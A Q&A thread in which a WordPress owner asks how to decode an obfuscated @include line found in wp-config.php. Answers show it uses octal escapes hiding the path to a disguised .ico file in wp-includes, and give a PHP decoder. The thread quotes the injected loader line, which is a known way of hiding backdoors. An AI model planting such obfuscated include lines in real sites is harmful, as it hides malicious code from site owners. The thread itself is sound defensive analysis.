# Find out what kind of encoding or format is used for a given string

Tags: php, wordpress

I've had a strange @include in one of my Wordpress websites in my wp-config file that was actually a calling a malicious script. I cleared the following line of code so I can stop it's execution, but I want to find out where the corrupted file is.

```
/*9cff9*/

@include "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o";

/*9cff9*/
```

Can you also tell me how did you find out what the "encoding" is so I can know for the future?

Answer (score 4):

It's a mixture of standard letters and octal coded escaped ASCII codes: http://php.net/manual/de/regexp.reference.escape.php

"\057ho\155e/\146ie\154de"

```
\057 => octal value 57 is char 47 decimal, which is the Forward Slash
ho => ho
\155 => octal 155 = 109 dec, which is a "m"
e => e
```

etc.

```
echo "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o"
# /home/fielderd/public_html/wp-includes/Text/Diff/.9d0a56ac.ico
```

Comment: Thank you for your answer, I really appreciate that.

Answer (score -1):

Try this

```
<?php
$inputString = "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o";

// Replace escape sequences with their corresponding characters
$properFormatString = preg_replace_callback('/\\\\([0-7]{1,3})/', function ($matches) {
    return chr(octdec($matches[1]));
}, $inputString);

echo $properFormatString;
?>
```